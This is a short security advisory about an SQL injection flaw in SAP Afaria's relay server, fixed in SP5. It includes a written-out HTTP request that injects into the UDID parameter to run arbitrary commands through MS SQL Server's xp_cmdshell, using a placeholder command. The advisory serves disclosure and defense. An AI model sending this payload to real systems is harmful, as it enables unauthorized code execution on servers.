SSD Advisory – SAP Afaria SQL Injection
Vulnerabilities Summary
The following advisory describes an SQL injection vulnerabilities in the SAP Afaria Service Pack 4 HotFix 15 that can lead to execute arbitrary code.
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor Responses
SAP Afaria has released patch to address the vulnerability – SP5
Vulnerability Details
When Afaria installed on mobile device, the user is given an “enrollment code” which is used to identify the relay server. This enrollment code is a URI on tinyurl that redirects to the relay server so that users do not have to type in the https://FQDN/path.
The following two HTTP requests can be used to trigger the SQL injection and call the MS SQL Server’s xp_cmdshell command and cause the SQL server to execute arbitrary code.
Command Injection #1
Command Injection #2
1 2 3 4 5 6 7 8 | GET /ias_relay_server/client/rs_client.dll/mdm–es/devunauth/aipService.svc/GetClientBrandingData?UDID=UDID‘;CALL%20xp_cmdshell(‘INJECT_COMMAND’);—&TenantID=0&ImageType=iPad1G HTTP/1.1 Host: example.com:443 User–Agent: Afaria iPhone Client Accept: */* Accept–Language: en–us Accept–Encoding: gzip, deflate Cookie: ias–rs–sessionid=“cookie” Connection: keep–alive |